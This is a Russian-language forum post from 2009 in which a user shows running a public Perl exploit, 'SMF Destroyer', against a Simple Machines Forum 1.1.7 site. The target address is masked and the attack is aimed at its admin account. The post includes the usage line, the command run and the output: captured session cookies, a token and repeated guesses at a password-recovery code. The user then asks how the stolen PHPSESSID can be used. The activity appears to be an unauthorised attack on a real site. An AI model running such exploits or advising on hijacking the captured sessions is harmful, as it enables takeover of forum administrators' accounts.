Показать сообщение отдельно

  #88  
Старый 05.03.2009, 17:10
Mapkyc_
Познающий
Регистрация: 15.07.2008
Сообщений: 33
С нами: 9380482

Репутация: 8
По умолчанию

Вопрос по exploit для SMF 1.1.7 (http://www.securitylab.ru/poc/extra/366302.php)
Вот что ролучается

Use: smf.pl -c [URL SMF] [Nick Admin] [ID
Admin] [Proxy:Puerto]
Example: smf.pl -p
http://www.simplemachines.org/community/ dschwab9 179
www.carlosslim.com:3128

C:\Err0r\exploits>perl smf.pl -c http://forum.хххх.ру/ lo6ara 322


SMF Destroyer 0.1 By Xianur0 [Priv8]


[-] Sending Mail...


[+] SESSION Detected: PHPSESSID=p9r60qks24t47n776a5klsotg4; path=/

[+] sc Detected: 6b7693f9d664395f8c1d7bad6ec323ca
[x]Sent!

[-] Attacking code link recovery...

[+] New SESSION Detected: PHPSESSID=9uq84q83ngsvb1t1flnn8c53m4; path=/
[+] Testing Code: 5b1t81b4nd

И дальши вниз долго идут разные строки вида
[+] New SESSION Detected: PHPSESSID=9uq84q83ngsvb1t1flnn8c53m4; path=/
[+] Testing Code: 5b1t81b4nd


Че это мне все дает ? и в чем может пригодится PHPSESSID ?
 
Ответить с цитированием